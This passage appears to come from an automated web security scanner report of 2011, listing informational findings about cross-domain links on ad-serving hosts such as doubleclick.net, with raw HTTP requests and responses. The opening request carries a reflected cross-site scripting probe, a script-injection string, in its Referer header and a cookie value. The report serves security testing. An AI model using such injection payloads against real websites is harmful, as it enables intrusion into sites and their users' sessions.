User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/100bf%22%3E%3Cscript%3Ealert(/XSS?)%3C/script%3E17b3cdbf2ef?ver=582_en_US
Cookie: __utma=103303007.305566496.1308924557.1308924557.1308924557.1; __utmb=103303007.3.10.1308924557; __utmc=103303007; __utmz=103303007.1308924557.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_ria=flash%20not%20detected%7Csilverlight%20not%20detected; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3A404; s_sq=%5B%5BB%5D%5D; BIGipServerp-drh-dc2pod5-pool3-active=4194435594.260.0000; fsr.s={"v":1,"rid":"1308924564819_872232","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":5,"c":"http://web-static.ea.com/us/portal/js/jquery/100bf\"><script>alert(1)</script>17b3cdbf2ef","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1308924601287}; s_ppv=0; fsr.a=1308924625326

Response

HTTP/1.1 301 Moved Permanently
Location: http://store.origin.com/integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924624286--%3E
Content-Type: text/html; charset=iso-8859-1
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=124863071614,0)
Content-Length: 632
Date: Fri, 24 Jun 2011 14:10:25 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://store.origin.com/integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924624286--%3E">here</A>
...[SNIP]...
18.12. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=2010860;type=2011t872;cat=europ762;ord=518583520315.5875? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 24 Jun 2011 13:22:45 GMT
Expires: Fri, 24 Jun 2011 13:22:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 279
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img height="1" width="1" src="http://view.atdmt.com/action/Celeb_RM_Europe_030411"/></body>
...[SNIP]...
18.13. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 24 Jun 2011 17:04:24 GMT
Expires: Fri, 24 Jun 2011 17:04:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1461
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "Metlife" c/o "Neo@Ogilvy", segment: 'MetLife Homepage (With Recencies)' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6171&pixelID=64973&pixelID=64974&partnerID=9&clientID=1721&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=6171&pixelID=64973&pixelID=64974&partnerID=9&clientID=1721&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag --><img src="http://ads.bluelithium.com/pixel?id=316251&t=2" width="1" height="1" />
<!-- Start Quantcast Tag -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-800TOflix8dOQ.gif?labels=_fp.event.MetlifeSitePage" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=48314;sz=1x1;ord=1?"width="1" height="1" border="0" alt=""><script src="http://i.simpli.fi/dpx.js?cid=155&pid=0&action=101&segment=MetLife&m=1"></script>
...[SNIP]...
18.14. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=315899333 HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 24 Jun 2011 13:26:35 GMT
Expires: Fri, 24 Jun 2011 13:26:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 333
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://media.fastclick.net/w/tre?ad_id=17597;evt=17799;cat1=22392;cat2=22393;rand=[CACHEBUSTER]" width="1" height="1" border="0"></body>
...[SNIP]...
18.15. http://gan.doubleclick.net/gan_impression  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gan.doubleclick.net
Path:   /gan_impression

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /gan_impression?lid=41000000032486330&pubid=21000000000251888 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://affiliate.2mdn.net/media/21000000000288863/0/88000000000183903.jpg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:31:03 GMT
Server: ads-affiliate-network-event-server
Content-Length: 270
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://affiliate.2mdn.net/media/21000000000288863/0/88000000000183903.jpg">here</A>
...[SNIP]...
18.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637628&bpp=5&shv=r20110615&jsv=r20110616&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=1&dtd=426&xpc=k1mQeRIDm4&p=http%3A//phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=OBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:20:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 1454
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.adroll.com/j/rolling.js"></script>
...[SNIP]...
18.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:22:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 2085
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><a target="_blank" href="http://adclick.g.doubleclick.net/aclk?sa=l&ai=BfELNjo8ETsG2FKP7lQesrNm2AceTxJcC76KQhyXAj
...[SNIP]...
-120/600%3B42361883/42379670/1%3B%3B%7Esscs%3D%3fhttp://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky"><img src="http://s0.2mdn.net/viewad/2010860/Q211_Acq_DR_EU_Extraordinary_BN_g_120x600_CEL.gif.gif" border=0 alt="Advertisement"></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.phuket-travel.com/%26hl%3Den%26client%3Dca-pub-4422256122899399%26adU%3Dcelebritycruises.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNH0DLVYkxhZPu_z4-wFRY8A17W0Jw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...
18.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8707574490954974&output=html&h=250&slotname=0966043985&w=300&lmt=1308940014&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922014502&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218&correlator=1308922009816&frm=4&adk=3718087554&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=2&dtd=19&xpc=95bno1LOUQ&p=http%3A//www.gamersdailynews.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:31:15 GMT
Server: cafe
Cache-Control: private
Content-Length: 4038
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html%26hl%3Den%26client%3Dca-pub-8707574490954974%26adU%3Dwww.nacdonline.org/board-training%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEq5TtRmChsZp3EkpHMf4Nq8ahbRA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110615/r20110616/abg.js"></script>
...[SNIP]...
18.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8707574490954974&output=html&h=600&slotname=7288386218&w=160&lmt=1308940009&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922009787&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308922009816&frm=4&adk=4018589424&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895298%2C33895143&fu=0&ifi=1&dtd=4295&xpc=Nv9GXPh4KP&p=http%3A//www.gamersdailynews.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:31:14 GMT
Server: cafe
Cache-Control: private
Content-Length: 5032
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
<NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-84gfysC3jMQaY&labels=_qc.clk,_click.adserver.rtb,_click.rand.20997&rtbip=70.42.105.16&rtbdata2=EAAaEkNhc3RvclBvbGx1eF9RMi0xMSCIDCiHHTCW3x46YGh0dHA6Ly93d3cuZ2FtZXJzZGFpbHluZXdzLmNvbS9zdG9yeS0yMTUzMy00MC1vZi1JbnRlcm5ldC1Vc2Vycy1QbGF5LUNhc3VhbC1HYW1lcy1TYXlzLVNwaWwuaHRtbEIGCM-nChBJUAFaKHptOF9aYzVwWkRQWE9Ea3h6VDl4WjU5dVBXUFhNejR3enptQWlFUWFoG3Uh-tM-gAGqmM3dBpABrqEKoAEBqAHZpQqwAQK6AR1DQUVTRURnckpMM2pYVHJTdkZ6WkUtTlMySWs6McABrtl0yAGuw-OOjCY&redirecturl2=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BlFY_opEETsmWBZGrsQfUvf3lBo6foZQCtuLYkRbggoi8FgAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi04NzA3NTc0NDkwOTU0OTc0oAHQlMDzA7IBF3d3dy5nYW1lcnNkYWlseW5ld3MuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cuZ2FtZXJzZGFpbHluZXdzLmNvbS9zdG9yeS0yMTUzMy00MC1vZi1JbnRlcm5ldC1Vc2Vycy1QbGF5LUNhc3VhbC1HYW1lcy1TYXlzLVNwaWwuaHRtbJgCiA7AAgTIAvbxygmoAwHoAzzoAynoA5UJ6AOVCPUDAAAAzIAGwMGypbegkOuNAQ&num=1&sig=AGiWqtwoI-37TAG3Ud-clpGUUqJG7886YA&client=ca-pub-8707574490954974&adurl=http://ad.doubleclick.net/jump/N6103.151350.QUANTCAST/B5539752.3;abr=!ie4;abr=!ie5;sz=160x600;ord=20997?"><IMG SRC="http://ad.doubleclick.net/ad/N6103.151350.QUANTCAST/B5539752.3;abr=!ie4;abr=!ie5;sz=160x600;ord=20997?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement">
...[SNIP]...
</IFRAME><img src="http://exch.quantserve.com/pixel/p-84gfysC3jMQaY.gif?media=ad&p=TgSRogABS0kK7FWRbL9e1A62htE2Wi1EZcBQ8Q&r=1578922970&rand=20997&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.41,_imp.optdr.0&rtbip=70.42.105.16&rtbdata2=EAAaEkNhc3RvclBvbGx1eF9RMi0xMSCIDCiHHTCW3x46YGh0dHA6Ly93d3cuZ2FtZXJzZGFpbHluZXdzLmNvbS9zdG9yeS0yMTUzMy00MC1vZi1JbnRlcm5ldC1Vc2Vycy1QbGF5LUNhc3VhbC1HYW1lcy1TYXlzLVNwaWwuaHRtbEIGCM-nChBJUAFaKHptOF9aYzVwWkRQWE9Ea3h6VDl4WjU5dVBXUFhNejR3enptQWlFUWFoG3Uh-tM-gAGqmM3dBpABrqEKoAEBqAHZpQqwAQK6AR1DQUVTRURnckpMM2pYVHJTdkZ6WkUtTlMySWs6McABrtl0yAGuw-OOjCY" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...
18.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-8707574490954974&output=html&h=600&slotname=7288386218&w=160&lmt=1308940017&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922016993&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218%2C0966043985&correlator=1308922009816&frm=4&adk=54353688&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=3&dtd=18&xpc=egLeutRzre&p=http%3A//www.gamersdailynews.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:26:56 GMT
Server: cafe
Cache-Control: private
Content-Length: 1704
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
